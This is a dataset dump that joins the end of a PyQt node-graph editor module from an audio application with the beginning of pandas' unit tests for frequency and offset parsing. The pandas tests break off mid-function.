def __stateChanged(self, state_change: audioproc.NodeStateChange) -> None:
if state_change.HasField('state'):
self.__state = state_change.state
self.__updateState()
def __updateState(self) -> None:
if self.__selected or self.__hovered:
opacity = 1.0
else:
opacity = 0.7
self.__box.setOpacity(opacity)
for port in self.__ports.values():
if not port.highlighted():
port.setOpacity(opacity)
if self.__state == audioproc.NodeStateChange.BROKEN:
pen = QtGui.QPen()
pen.setColor(Qt.black)
pen.setWidth(2)
self.__box.setPen(pen)
self.__box.setBrush(QtGui.QColor(255, 0, 0))
elif self.__selected:
pen = QtGui.QPen()
pen.setColor(QtGui.QColor(80, 80, 200))
pen.setWidth(2)
self.__box.setPen(pen)
self.__box.setBrush(QtGui.QColor(150, 150, 255))
else:
pen = QtGui.QPen()
pen.setColor(Qt.black)
pen.setWidth(2)
self.__box.setPen(pen)
self.__box.setBrush(QtGui.QColor.fromRgbF(
self.__node.graph_color.r,
self.__node.graph_color.g,
self.__node.graph_color.b,
self.__node.graph_color.a))
def __layout(self) -> None:
self.setPos(self.__canvas_rect.topLeft())
w, h = self.__canvas_rect.width(), self.__canvas_rect.height()
path = QtGui.QPainterPath()
path.addRoundedRect(0, 0, w, h, 5, 5)
self.__box.setPath(path)
visible_in_ports = []
for desc in self.__in_ports:
port_properties = self.__node.get_port_properties(desc.name)
if not port_properties.exposed:
port = self.__ports[desc.name]
port.setVisible(False)
continue
visible_in_ports.append(desc)
show_ports = (0.5 * h > 10 * max(len(visible_in_ports), len(self.__out_ports)))
for idx, desc in enumerate(visible_in_ports):
port = self.__ports[desc.name]
if len(visible_in_ports) > 1:
y = h * (0.5 * idx / (len(visible_in_ports) - 1) + 0.25)
else:
y = h * 0.5
port.setPos(0, y)
port.setVisible(show_ports)
for idx, desc in enumerate(self.__out_ports):
port = self.__ports[desc.name]
if len(self.__out_ports) > 1:
y = h * (0.5 * idx / (len(self.__out_ports) - 1) + 0.25)
else:
y = h * 0.5
port.setPos(w, y)
port.setVisible(show_ports)
if self.__rename_node:
title_h = self.__title_edit_proxy.minimumHeight() + 4
self.__title_edit_proxy.setVisible(True)
self.__title_edit_proxy.setPos(4, 4)
self.__title_edit_proxy.resize(w - 8, self.__title_edit_proxy.minimumHeight())
else:
title_h = 24
self.__title_edit_proxy.setVisible(False)
if self.__title_widgets_proxy is not None:
if (h > self.__title_widgets_container.height() + 2
and w > self.__title_widgets_container.width() + 40
and not self.__rename_node):
self.__title_widgets_proxy.setVisible(True)
self.__title_widgets_proxy.setPos(
w - self.__title_widgets_container.width() - 4, 2)
title_h = self.__title_widgets_container.height() + 4
else:
self.__title_widgets_proxy.setVisible(False)
if h > 20 and not self.__rename_node:
self.__title.setVisible(True)
self.__title.setPos(8, (title_h - 2 - self.__title.boundingRect().height()) / 2)
if self.__title_widgets_proxy is not None and self.__title_widgets_proxy.isVisible():
self.__title.setWidth(self.__title_widgets_proxy.pos().x() - 8)
else:
self.__title.setWidth(w - 16)
else:
self.__title.setVisible(False)
if self.__icon is not None:
if self.__title.isVisible():
icon_y = 24
else:
icon_y = 3
self.__icon.setRect(QtCore.QRectF(3, icon_y, w - 6, h - icon_y - 6))
if self.__body_proxy is not None:
bsize = self.__body_proxy.minimumSize()
if h > bsize.height() + (title_h + 4) and w > bsize.width() + 8:
self.__body_proxy.setVisible(True)
self.__body_proxy.setPos(4, title_h)
self.__body_proxy.resize(w - 8, h - (title_h + 4))
else:
self.__body_proxy.setVisible(False)
if self.__title_edit_proxy.isVisible():
drag_rect_width, drag_rect_height = 0.0, 0.0
else:
if self.__body_proxy is not None and self.__body_proxy.isVisible():
drag_rect_height = title_h
else:
drag_rect_height = h
if self.__title_widgets_proxy is not None and self.__title_widgets_proxy.isVisible():
drag_rect_width = self.__title_widgets_proxy.pos().x()
else:
drag_rect_width = w
self.__drag_rect = QtCore.QRectF(0, 0, drag_rect_width, drag_rect_height)
self.props.canvasLayoutChanged.emit()
def paint(
self, painter: QtGui.QPainter, option: QtWidgets.QStyleOptionGraphicsItem,
widget: Optional[QtWidgets.QWidget] = None) -> None:
pass
def mousePressEvent(self, event: QtWidgets.QGraphicsSceneMouseEvent) -> None:
self.setZValue(Node.__next_zvalue)
Node.__next_zvalue += 1
event.ignore()
super().mousePressEvent(event)
def hoverEnterEvent(self, event: QtWidgets.QGraphicsSceneHoverEvent) -> None:
self.__hovered = True
self.__updateState()
return super().hoverEnterEvent(event)
def hoverLeaveEvent(self, event: QtWidgets.QGraphicsSceneHoverEvent) -> None:
self.__hovered = False
self.__updateState()
return super().hoverLeaveEvent(event)
def buildContextMenu(self, menu: QtWidgets.QMenu) -> None:
if self.has_window:
show_window = menu.addAction("Open in window")
show_window.triggered.connect(self.onShowWindow)
if self.__node.removable:
remove = menu.addAction("Remove")
remove.triggered.connect(self.onRemove)
rename = menu.addAction("Rename")
rename.triggered.connect(self.renameNode)
color_menu = menu.addMenu("Set color")
color_action = SelectColorAction(color_menu)
color_action.colorSelected.connect(self.onSetColor)
color_menu.addAction(color_action)
def onShowWindow(self) -> None:
if self.__window is None:
self.__window = self.createWindow(parent=self.project_view)
self.__window.show()
self.__window.raise_()
self.__window.activateWindow()
def onRemove(self) -> None:
with self.project.apply_mutations('Remove node %s' % self.__node.name):
for conn in self.__node.connections:
self.project.remove_node_connection(conn)
self.project.remove_node(self.__node)
def onSetColor(self, color: value_types.Color) -> None:
if color != self.__node.graph_color:
with self.project.apply_mutations('%s: Set color' % self.__node.name):
self.__node.graph_color = color
def renameNode(self) -> None:
self.__rename_node = True
self.__title_edit.setText(self.__node.name)
self.__title_edit.setFocus()
self.__title_edit.selectAll()
self.__layout()
def __renameNodeFinished(self) -> None:
new_name = self.__title_edit.text()
if new_name != self.__node.name:
self.__title.setText(self.__node.name)
with self.project.apply_mutations('%s: Rename to "%s"' % (self.__node.name, new_name)):
self.__node.name = new_name
self.__rename_node = False
self.__layout()
class Connection(ui_base.ProjectMixin, QtWidgets.QGraphicsPathItem):
def __init__(
self, *,
connection: music.NodeConnection,
src_node: Node,
dest_node: Node,
**kwargs: Any) -> None:
super().__init__(**kwargs)
self.__connection = connection
self.__src_node = src_node
self.__dest_node = dest_node
self.__highlighted = False
self.__src_node_canvas_layout_changed_connection = \
self.__src_node.props.canvasLayoutChanged.connect(self.__update)
self.__dest_node_canvas_layout_changed_connection = \
self.__dest_node.props.canvasLayoutChanged.connect(self.__update)
self.__update()
def cleanup(self) -> None:
if self.__src_node_canvas_layout_changed_connection is not None:
self.__src_node.props.canvasLayoutChanged.disconnect(
self.__src_node_canvas_layout_changed_connection)
self.__src_node_canvas_layout_changed_connection = None
if self.__dest_node_canvas_layout_changed_connection is not None:
self.__dest_node.props.canvasLayoutChanged.disconnect(
self.__dest_node_canvas_layout_changed_connection)
self.__dest_node_canvas_layout_changed_connection = None
def connection(self) -> music.NodeConnection:
return self.__connection
def id(self) -> int:
return self.__connection.id
def src_node(self) -> Node:
return self.__src_node
def src_port(self) -> Port:
return self.__src_node.port(self.__connection.source_port)
def dest_node(self) -> Node:
return self.__dest_node
def dest_port(self) -> Port:
return self.__dest_node.port(self.__connection.dest_port)
def setHighlighted(self, highlighted: bool) -> None:
self.__highlighted = highlighted
self.__update()
def __update(self) -> None:
color = port_colors[self.__connection.type]
if self.__highlighted:
pen = QtGui.QPen()
pen.setColor(color)
pen.setWidth(4)
self.setPen(pen)
else:
pen = QtGui.QPen()
pen.setColor(color)
pen.setWidth(2)
self.setPen(pen)
pos1 = self.__src_node.portHandleScenePos(self.__connection.source_port)
pos2 = self.__dest_node.portHandleScenePos(self.__connection.dest_port)
cpos = QtCore.QPointF(min(100, abs(pos2.x() - pos1.x()) / 2), 0)
path = QtGui.QPainterPath()
path.moveTo(pos1)
path.cubicTo(pos1 + cpos, pos2 - cpos, pos2)
self.setPath(path)
| gpl-2.0 | 6,715,687,354,517,147,000 | 33.472672 | 99 | 0.580023 | false |
GuessWhoSamFoo/pandas | pandas/tests/tseries/test_frequencies.py | 1 | 29684 | from datetime import datetime, timedelta
import numpy as np
import pytest
from pandas._libs.tslibs import frequencies as libfrequencies, resolution
from pandas._libs.tslibs.ccalendar import MONTHS
from pandas._libs.tslibs.frequencies import (
INVALID_FREQ_ERR_MSG, FreqGroup, _period_code_map, get_freq, get_freq_code)
import pandas.compat as compat
from pandas.compat import is_platform_windows, range
from pandas import (
DatetimeIndex, Index, Series, Timedelta, Timestamp, date_range,
period_range)
from pandas.core.tools.datetimes import to_datetime
import pandas.util.testing as tm
import pandas.tseries.frequencies as frequencies
import pandas.tseries.offsets as offsets
class TestToOffset(object):
def test_to_offset_multiple(self):
freqstr = '2h30min'
freqstr2 = '2h 30min'
result = frequencies.to_offset(freqstr)
assert (result == frequencies.to_offset(freqstr2))
expected = offsets.Minute(150)
assert (result == expected)
freqstr = '2h30min15s'
result = frequencies.to_offset(freqstr)
expected = offsets.Second(150 * 60 + 15)
assert (result == expected)
freqstr = '2h 60min'
result = frequencies.to_offset(freqstr)
expected = offsets.Hour(3)
assert (result == expected)
freqstr = '2h 20.5min'
result = frequencies.to_offset(freqstr)
expected = offsets.Second(8430)
assert (result == expected)
freqstr = '1.5min'
result = frequencies.to_offset(freqstr)
expected = offsets.Second(90)
assert (result == expected)
freqstr = '0.5S'
result = frequencies.to_offset(freqstr)
expected = offsets.Milli(500)
assert (result == expected)
freqstr = '15l500u'
result = frequencies.to_offset(freqstr)
expected = offsets.Micro(15500)
assert (result == expected)
freqstr = '10s75L'
result = frequencies.to_offset(freqstr)
expected = offsets.Milli(10075)
assert (result == expected)
freqstr = '1s0.25ms'
result = frequencies.to_offset(freqstr)
expected = offsets.Micro(1000250)
assert (result == expected)
freqstr = '1s0.25L'
result = frequencies.to_offset(freqstr)
expected = offsets.Micro(1000250)
assert (result == expected)
freqstr = '2800N'
result = frequencies.to_offset(freqstr)
expected = offsets.Nano(2800)
assert (result == expected)
freqstr = '2SM'
result = frequencies.to_offset(freqstr)
expected = offsets.SemiMonthEnd(2)
assert (result == expected)
freqstr = '2SM-16'
result = frequencies.to_offset(freqstr)
expected = offsets.SemiMonthEnd(2, day_of_month=16)
assert (result == expected)
freqstr = '2SMS-14'
result = frequencies.to_offset(freqstr)
expected = offsets.SemiMonthBegin(2, day_of_month=14)
assert (result == expected)
freqstr = '2SMS-15'
result = frequencies.to_offset(freqstr)
expected = offsets.SemiMonthBegin(2)
assert (result == expected)
# malformed
with pytest.raises(ValueError, match='Invalid frequency: 2h20m'):
frequencies.to_offset('2h20m')
def test_to_offset_negative(self):
freqstr = '-1S'
result = frequencies.to_offset(freqstr)
assert (result.n == -1)
freqstr = '-5min10s'
result = frequencies.to_offset(freqstr)
assert (result.n == -310)
freqstr = '-2SM'
result = frequencies.to_offset(freqstr)
assert (result.n == -2)
freqstr = '-1SMS'
result = frequencies.to_offset(freqstr)
assert (result.n == -1)
def test_to_offset_invalid(self):
# GH 13930
with pytest.raises(ValueError, match='Invalid frequency: U1'):
frequencies.to_offset('U1')
with pytest.raises(ValueError, match='Invalid frequency: -U'):
frequencies.to_offset('-U')
with pytest.raises(ValueError, match='Invalid frequency: 3U1'):
frequencies.to_offset('3U1')
with pytest.raises(ValueError, match='Invalid frequency: -2-3U'):
frequencies.to_offset('-2-3U')
with pytest.raises(ValueError, match='Invalid frequency: -2D:3H'):
frequencies.to_offset('-2D:3H')
with pytest.raises(ValueError, match='Invalid frequency: 1.5.0S'):
frequencies.to_offset('1.5.0S')
# split offsets with spaces are valid
assert frequencies.to_offset('2D 3H') == offsets.Hour(51)
assert frequencies.to_offset('2 D3 H') == offsets.Hour(51)
assert frequencies.to_offset('2 D 3 H') == offsets.Hour(51)
assert frequencies.to_offset(' 2 D 3 H ') == offsets.Hour(51)
assert frequencies.to_offset(' H ') == offsets.Hour()
assert frequencies.to_offset(' 3 H ') == offsets.Hour(3)
# special cases
assert frequencies.to_offset('2SMS-15') == offsets.SemiMonthBegin(2)
with pytest.raises(ValueError, match='Invalid frequency: 2SMS-15-15'):
frequencies.to_offset('2SMS-15-15')
with pytest.raises(ValueError, match='Invalid frequency: 2SMS-15D'):
frequencies.to_offset('2SMS-15D')
def test_to_offset_leading_zero(self):
freqstr = '00H 00T 01S'
result = frequencies.to_offset(freqstr)
assert (result.n == 1)
freqstr = '-00H 03T 14S'
result = frequencies.to_offset(freqstr)
assert (result.n == -194)
def test_to_offset_leading_plus(self):
freqstr = '+1d'
result = frequencies.to_offset(freqstr)
assert (result.n == 1)
freqstr = '+2h30min'
result = frequencies.to_offset(freqstr)
assert (result.n == 150)
for bad_freq in ['+-1d', '-+1h', '+1', '-7', '+d', '-m']:
with pytest.raises(ValueError, match='Invalid frequency:'):
frequencies.to_offset(bad_freq)
def test_to_offset_pd_timedelta(self):
# Tests for #9064
td = Timedelta(days=1, seconds=1)
result = frequencies.to_offset(td)
expected = offsets.Second(86401)
assert (expected == result)
td = Timedelta(days=-1, seconds=1)
result = frequencies.to_offset(td)
expected = offsets.Second(-86399)
assert (expected == result)
td = Timedelta(hours=1, minutes=10)
result = frequencies.to_offset(td)
expected = offsets.Minute(70)
assert (expected == result)
td = Timedelta(hours=1, minutes=-10)
result = frequencies.to_offset(td)
expected = offsets.Minute(50)
assert (expected == result)
td = Timedelta(weeks=1)
result = frequencies.to_offset(td)
expected = offsets.Day(7)
assert (expected == result)
td1 = Timedelta(hours=1)
result1 = frequencies.to_offset(td1)
result2 = frequencies.to_offset('60min')
assert (result1 == result2)
td = Timedelta(microseconds=1)
result = frequencies.to_offset(td)
expected = offsets.Micro(1)
assert (expected == result)
td = Timedelta(microseconds=0)
pytest.raises(ValueError, lambda: frequencies.to_offset(td))
def test_anchored_shortcuts(self):
result = frequencies.to_offset('W')
expected = frequencies.to_offset('W-SUN')
assert (result == expected)
result1 = frequencies.to_offset('Q')
result2 = frequencies.to_offset('Q-DEC')
expected = offsets.QuarterEnd(startingMonth=12)
assert (result1 == expected)
assert (result2 == expected)
result1 = frequencies.to_offset('Q-MAY')
expected = offsets.QuarterEnd(startingMonth=5)
assert (result1 == expected)
result1 = frequencies.to_offset('SM')
result2 = frequencies.to_offset('SM-15')
expected = offsets.SemiMonthEnd(day_of_month=15)
assert (result1 == expected)
assert (result2 == expected)
result = frequencies.to_offset('SM-1')
expected = offsets.SemiMonthEnd(day_of_month=1)
assert (result == expected)
result = frequencies.to_offset('SM-27')
expected = offsets.SemiMonthEnd(day_of_month=27)
assert (result == expected)
result = frequencies.to_offset('SMS-2')
expected = offsets.SemiMonthBegin(day_of_month=2)
assert (result == expected)
result = frequencies.to_offset('SMS-27')
expected = offsets.SemiMonthBegin(day_of_month=27)
assert (result == expected)
# ensure invalid cases fail as expected
invalid_anchors = ['SM-0', 'SM-28', 'SM-29',
'SM-FOO', 'BSM', 'SM--1',
'SMS-1', 'SMS-28', 'SMS-30',
'SMS-BAR', 'SMS-BYR' 'BSMS',
'SMS--2']
for invalid_anchor in invalid_anchors:
with pytest.raises(ValueError, match='Invalid frequency: '):
frequencies.to_offset(invalid_anchor)
def test_ms_vs_MS():
left = frequencies.get_offset('ms')
right = frequencies.get_offset('MS')
assert left == offsets.Milli()
assert right == offsets.MonthBegin()
def test_rule_aliases():
rule = frequencies.to_offset('10us')
assert rule == offsets.Micro(10)
class TestFrequencyCode(object):
def test_freq_code(self):
assert get_freq('A') == 1000
assert get_freq('3A') == 1000
assert get_freq('-1A') == 1000
assert get_freq('Y') == 1000
assert get_freq('3Y') == 1000
assert get_freq('-1Y') == 1000
assert get_freq('W') == 4000
assert get_freq('W-MON') == 4001
assert get_freq('W-FRI') == 4005
for freqstr, code in compat.iteritems(_period_code_map):
result = get_freq(freqstr)
assert result == code
result = resolution.get_freq_group(freqstr)
assert result == code // 1000 * 1000
result = resolution.get_freq_group(code)
assert result == code // 1000 * 1000
def test_freq_group(self):
assert resolution.get_freq_group('A') == 1000
assert resolution.get_freq_group('3A') == 1000
assert resolution.get_freq_group('-1A') == 1000
assert resolution.get_freq_group('A-JAN') == 1000
assert resolution.get_freq_group('A-MAY') == 1000
assert resolution.get_freq_group('Y') == 1000
assert resolution.get_freq_group('3Y') == 1000
assert resolution.get_freq_group('-1Y') == 1000
assert resolution.get_freq_group('Y-JAN') == 1000
assert resolution.get_freq_group('Y-MAY') == 1000
assert resolution.get_freq_group(offsets.YearEnd()) == 1000
assert resolution.get_freq_group(offsets.YearEnd(month=1)) == 1000
assert resolution.get_freq_group(offsets.YearEnd(month=5)) == 1000
assert resolution.get_freq_group('W') == 4000
assert resolution.get_freq_group('W-MON') == 4000
assert resolution.get_freq_group('W-FRI') == 4000
assert resolution.get_freq_group(offsets.Week()) == 4000
assert resolution.get_freq_group(offsets.Week(weekday=1)) == 4000
assert resolution.get_freq_group(offsets.Week(weekday=5)) == 4000
def test_get_to_timestamp_base(self):
tsb = libfrequencies.get_to_timestamp_base
assert (tsb(get_freq_code('D')[0]) ==
get_freq_code('D')[0])
assert (tsb(get_freq_code('W')[0]) ==
get_freq_code('D')[0])
assert (tsb(get_freq_code('M')[0]) ==
get_freq_code('D')[0])
assert (tsb(get_freq_code('S')[0]) ==
get_freq_code('S')[0])
assert (tsb(get_freq_code('T')[0]) ==
get_freq_code('S')[0])
assert (tsb(get_freq_code('H')[0]) ==
get_freq_code('S')[0])
def test_freq_to_reso(self):
Reso = resolution.Resolution
assert Reso.get_str_from_freq('A') == 'year'
assert Reso.get_str_from_freq('Q') == 'quarter'
assert Reso.get_str_from_freq('M') == 'month'
assert Reso.get_str_from_freq('D') == 'day'
assert Reso.get_str_from_freq('H') == 'hour'
assert Reso.get_str_from_freq('T') == 'minute'
assert Reso.get_str_from_freq('S') == 'second'
assert Reso.get_str_from_freq('L') == 'millisecond'
assert Reso.get_str_from_freq('U') == 'microsecond'
assert Reso.get_str_from_freq('N') == 'nanosecond'
for freq in ['A', 'Q', 'M', 'D', 'H', 'T', 'S', 'L', 'U', 'N']:
# check roundtrip
result = Reso.get_freq(Reso.get_str_from_freq(freq))
assert freq == result
for freq in ['D', 'H', 'T', 'S', 'L', 'U']:
result = Reso.get_freq(Reso.get_str(Reso.get_reso_from_freq(freq)))
assert freq == result
def test_resolution_bumping(self):
# see gh-14378
Reso = resolution.Resolution
assert Reso.get_stride_from_decimal(1.5, 'T') == (90, 'S')
assert Reso.get_stride_from_decimal(62.4, 'T') == (3744, 'S')
assert Reso.get_stride_from_decimal(1.04, 'H') == (3744, 'S')
assert Reso.get_stride_from_decimal(1, 'D') == (1, 'D')
assert (Reso.get_stride_from_decimal(0.342931, 'H') ==
(1234551600, 'U'))
assert Reso.get_stride_from_decimal(1.2345, 'D') == (106660800, 'L')
with pytest.raises(ValueError):
Reso.get_stride_from_decimal(0.5, 'N')
# too much precision in the input can prevent
with pytest.raises(ValueError):
Reso.get_stride_from_decimal(0.3429324798798269273987982, 'H')
def test_get_freq_code(self):
# frequency str
assert (get_freq_code('A') ==
(get_freq('A'), 1))
assert (get_freq_code('3D') ==
(get_freq('D'), 3))
assert (get_freq_code('-2M') ==
(get_freq('M'), -2))
# tuple
assert (get_freq_code(('D', 1)) ==
(get_freq('D'), 1))
assert (get_freq_code(('A', 3)) ==
(get_freq('A'), 3))
assert (get_freq_code(('M', -2)) ==
(get_freq('M'), -2))
# numeric tuple
assert get_freq_code((1000, 1)) == (1000, 1)
# offsets
assert (get_freq_code(offsets.Day()) ==
(get_freq('D'), 1))
assert (get_freq_code(offsets.Day(3)) ==
(get_freq('D'), 3))
assert (get_freq_code(offsets.Day(-2)) ==
(get_freq('D'), -2))
assert (get_freq_code(offsets.MonthEnd()) ==
(get_freq('M'), 1))
assert (get_freq_code(offsets.MonthEnd(3)) ==
(get_freq('M'), 3))
assert (get_freq_code(offsets.MonthEnd(-2)) ==
(get_freq('M'), -2))
assert (get_freq_code(offsets.Week()) ==
(get_freq('W'), 1))
assert (get_freq_code(offsets.Week(3)) ==
(get_freq('W'), 3))
assert (get_freq_code(offsets.Week(-2)) ==
(get_freq('W'), -2))
# Monday is weekday=0
assert (get_freq_code(offsets.Week(weekday=1)) ==
(get_freq('W-TUE'), 1))
assert (get_freq_code(offsets.Week(3, weekday=0)) ==
(get_freq('W-MON'), 3))
assert (get_freq_code(offsets.Week(-2, weekday=4)) ==
(get_freq('W-FRI'), -2))
def test_frequency_misc(self):
assert (resolution.get_freq_group('T') ==
FreqGroup.FR_MIN)
code, stride = get_freq_code(offsets.Hour())
assert code == FreqGroup.FR_HR
code, stride = get_freq_code((5, 'T'))
assert code == FreqGroup.FR_MIN
assert stride == 5
offset = offsets.Hour()
result = frequencies.to_offset(offset)
assert result == offset
result = frequencies.to_offset((5, 'T'))
expected = offsets.Minute(5)
assert result == expected
with pytest.raises(ValueError, match='Invalid frequency'):
get_freq_code((5, 'baz'))
with pytest.raises(ValueError, match='Invalid frequency'):
frequencies.to_offset('100foo')
with pytest.raises(ValueError, match='Could not evaluate'):
frequencies.to_offset(('', ''))
_dti = DatetimeIndex
class TestFrequencyInference(object):
def test_raise_if_period_index(self):
index = period_range(start="1/1/1990", periods=20, freq="M")
pytest.raises(TypeError, frequencies.infer_freq, index)
def test_raise_if_too_few(self):
index = _dti(['12/31/1998', '1/3/1999'])
pytest.raises(ValueError, frequencies.infer_freq, index)
def test_business_daily(self):
index = _dti(['01/01/1999', '1/4/1999', '1/5/1999'])
assert frequencies.infer_freq(index) == 'B'
def test_business_daily_look_alike(self):
# GH 16624, do not infer 'B' when 'weekend' (2-day gap) in wrong place
index = _dti(['12/31/1998', '1/3/1999', '1/4/1999'])
assert frequencies.infer_freq(index) is None
def test_day(self):
self._check_tick(timedelta(1), 'D')
def test_day_corner(self):
index = _dti(['1/1/2000', '1/2/2000', '1/3/2000'])
assert frequencies.infer_freq(index) == 'D'
def test_non_datetimeindex(self):
dates = to_datetime(['1/1/2000', '1/2/2000', '1/3/2000'])
assert frequencies.infer_freq(dates) == 'D'
def test_hour(self):
self._check_tick(timedelta(hours=1), 'H')
def test_minute(self):
self._check_tick(timedelta(minutes=1), 'T')
def test_second(self):
self._check_tick(timedelta(seconds=1), 'S')
def test_millisecond(self):
self._check_tick(timedelta(microseconds=1000), 'L')
def test_microsecond(self):
self._check_tick(timedelta(microseconds=1), 'U')
def test_nanosecond(self):
self._check_tick(np.timedelta64(1, 'ns'), 'N')
def _check_tick(self, base_delta, code):
b = Timestamp(datetime.now())
for i in range(1, 5):
inc = base_delta * i
index = _dti([b + inc * j for j in range(3)])
if i > 1:
exp_freq = '%d%s' % (i, code)
else:
exp_freq = code
assert frequencies.infer_freq(index) == exp_freq
index = _dti([b + base_delta * 7] + [b + base_delta * j for j in range(
3)])
assert frequencies.infer_freq(index) is None
index = _dti([b + base_delta * j for j in range(3)] + [b + base_delta *
7])
assert frequencies.infer_freq(index) is None
def test_weekly(self):
days = ['MON', 'TUE', 'WED', 'THU', 'FRI', 'SAT', 'SUN']
for day in days:
self._check_generated_range('1/1/2000', 'W-%s' % day)
def test_week_of_month(self):
days = ['MON', 'TUE', 'WED', 'THU', 'FRI', 'SAT', 'SUN']
for day in days:
for i in range(1, 5):
self._check_generated_range('1/1/2000', 'WOM-%d%s' % (i, day))
def test_fifth_week_of_month(self):
# Only supports freq up to WOM-4. See #9425
func = lambda: date_range('2014-01-01', freq='WOM-5MON')
pytest.raises(ValueError, func)
def test_fifth_week_of_month_infer(self):
# Only attempts to infer up to WOM-4. See #9425
index = DatetimeIndex(["2014-03-31", "2014-06-30", "2015-03-30"])
assert frequencies.infer_freq(index) is None
def test_week_of_month_fake(self):
# All of these dates are on same day of week and are 4 or 5 weeks apart
index = DatetimeIndex(["2013-08-27", "2013-10-01", "2013-10-29",
"2013-11-26"])
assert frequencies.infer_freq(index) != 'WOM-4TUE'
def test_monthly(self):
self._check_generated_range('1/1/2000', 'M')
def test_monthly_ambiguous(self):
rng = _dti(['1/31/2000', '2/29/2000', '3/31/2000'])
assert rng.inferred_freq == 'M'
def test_business_monthly(self):
self._check_generated_range('1/1/2000', 'BM')
def test_business_start_monthly(self):
self._check_generated_range('1/1/2000', 'BMS')
def test_quarterly(self):
for month in ['JAN', 'FEB', 'MAR']:
self._check_generated_range('1/1/2000', 'Q-%s' % month)
def test_annual(self):
for month in MONTHS:
self._check_generated_range('1/1/2000', 'A-%s' % month)
def test_business_annual(self):
for month in MONTHS:
self._check_generated_range('1/1/2000', 'BA-%s' % month)
def test_annual_ambiguous(self):
rng = _dti(['1/31/2000', '1/31/2001', '1/31/2002'])
assert rng.inferred_freq == 'A-JAN'
def _check_generated_range(self, start, freq):
freq = freq.upper()
gen = date_range(start, periods=7, freq=freq)
index = _dti(gen.values)
if not freq.startswith('Q-'):
assert frequencies.infer_freq(index) == gen.freqstr
else:
inf_freq = frequencies.infer_freq(index)
is_dec_range = inf_freq == 'Q-DEC' and gen.freqstr in (
'Q', 'Q-DEC', 'Q-SEP', 'Q-JUN', 'Q-MAR')
is_nov_range = inf_freq == 'Q-NOV' and gen.freqstr in (
'Q-NOV', 'Q-AUG', 'Q-MAY', 'Q-FEB')
is_oct_range = inf_freq == 'Q-OCT' and gen.freqstr in (
'Q-OCT', 'Q-JUL', 'Q-APR', 'Q-JAN')
assert is_dec_range or is_nov_range or is_oct_range
gen = date_range(start, periods=5, freq=freq)
index = _dti(gen.values)
if not freq.startswith('Q-'):
assert frequencies.infer_freq(index) == gen.freqstr
else:
inf_freq = frequencies.infer_freq(index)
is_dec_range = inf_freq == 'Q-DEC' and gen.freqstr in (
'Q', 'Q-DEC', 'Q-SEP', 'Q-JUN', 'Q-MAR')
is_nov_range = inf_freq == 'Q-NOV' and gen.freqstr in (
'Q-NOV', 'Q-AUG', 'Q-MAY', 'Q-FEB')
is_oct_range = inf_freq == 'Q-OCT' and gen.freqstr in (
'Q-OCT', 'Q-JUL', 'Q-APR', 'Q-JAN')
assert is_dec_range or is_nov_range or is_oct_range
def test_infer_freq(self):
rng = period_range('1959Q2', '2009Q3', freq='Q')
rng = Index(rng.to_timestamp('D', how='e').astype(object))
assert rng.inferred_freq == 'Q-DEC'
rng = period_range('1959Q2', '2009Q3', freq='Q-NOV')
rng = Index(rng.to_timestamp('D', how='e').astype(object))
assert rng.inferred_freq == 'Q-NOV'
rng = period_range('1959Q2', '2009Q3', freq='Q-OCT')
rng = Index(rng.to_timestamp('D', how='e').astype(object))
assert rng.inferred_freq == 'Q-OCT'
def test_infer_freq_tz(self):
freqs = {'AS-JAN':
['2009-01-01', '2010-01-01', '2011-01-01', '2012-01-01'],
'Q-OCT':
['2009-01-31', '2009-04-30', '2009-07-31', '2009-10-31'],
'M': ['2010-11-30', '2010-12-31', '2011-01-31', '2011-02-28'],
'W-SAT':
['2010-12-25', '2011-01-01', '2011-01-08', '2011-01-15'],
'D': ['2011-01-01', '2011-01-02', '2011-01-03', '2011-01-04'],
'H': ['2011-12-31 22:00', '2011-12-31 23:00',
'2012-01-01 00:00', '2012-01-01 01:00']}
# GH 7310
for tz in [None, 'Australia/Sydney', 'Asia/Tokyo', 'Europe/Paris',
'US/Pacific', 'US/Eastern']:
for expected, dates in compat.iteritems(freqs):
idx = DatetimeIndex(dates, tz=tz)
assert idx.inferred_freq == expected
def test_infer_freq_tz_transition(self):
# Tests for #8772
date_pairs = [['2013-11-02', '2013-11-5'], # Fall DST
['2014-03-08', '2014-03-11'], # Spring DST
['2014-01-01', '2014-01-03']] # Regular Time
freqs = ['3H', '10T', '3601S', '3600001L', '3600000001U',
'3600000000001N']
for tz in [None, 'Australia/Sydney', 'Asia/Tokyo', 'Europe/Paris',
'US/Pacific', 'US/Eastern']:
for date_pair in date_pairs:
for freq in freqs:
idx = date_range(date_pair[0], date_pair[
1], freq=freq, tz=tz)
assert idx.inferred_freq == freq
index = date_range("2013-11-03", periods=5,
freq="3H").tz_localize("America/Chicago")
assert index.inferred_freq is None
def test_infer_freq_businesshour(self):
# GH 7905
idx = DatetimeIndex(
['2014-07-01 09:00', '2014-07-01 10:00', '2014-07-01 11:00',
'2014-07-01 12:00', '2014-07-01 13:00', '2014-07-01 14:00'])
# hourly freq in a day must result in 'H'
assert idx.inferred_freq == 'H'
idx = DatetimeIndex(
['2014-07-01 09:00', '2014-07-01 10:00', '2014-07-01 11:00',
'2014-07-01 12:00', '2014-07-01 13:00', '2014-07-01 14:00',
'2014-07-01 15:00', '2014-07-01 16:00', '2014-07-02 09:00',
'2014-07-02 10:00', '2014-07-02 11:00'])
assert idx.inferred_freq == 'BH'
idx = DatetimeIndex(
['2014-07-04 09:00', '2014-07-04 10:00', '2014-07-04 11:00',
'2014-07-04 12:00', '2014-07-04 13:00', '2014-07-04 14:00',
'2014-07-04 15:00', '2014-07-04 16:00', '2014-07-07 09:00',
'2014-07-07 10:00', '2014-07-07 11:00'])
assert idx.inferred_freq == 'BH'
idx = DatetimeIndex(
['2014-07-04 09:00', '2014-07-04 10:00', '2014-07-04 11:00',
'2014-07-04 12:00', '2014-07-04 13:00', '2014-07-04 14:00',
'2014-07-04 15:00', '2014-07-04 16:00', '2014-07-07 09:00',
'2014-07-07 10:00', '2014-07-07 11:00', '2014-07-07 12:00',
'2014-07-07 13:00', '2014-07-07 14:00', '2014-07-07 15:00',
'2014-07-07 16:00', '2014-07-08 09:00', '2014-07-08 10:00',
'2014-07-08 11:00', '2014-07-08 12:00', '2014-07-08 13:00',
'2014-07-08 14:00', '2014-07-08 15:00', '2014-07-08 16:00'])
assert idx.inferred_freq == 'BH'
def test_not_monotonic(self):
rng = _dti(['1/31/2000', '1/31/2001', '1/31/2002'])
rng = rng[::-1]
assert rng.inferred_freq == '-1A-JAN'
def test_non_datetimeindex2(self):
rng = _dti(['1/31/2000', '1/31/2001', '1/31/2002'])
vals = rng.to_pydatetime()
result = frequencies.infer_freq(vals)
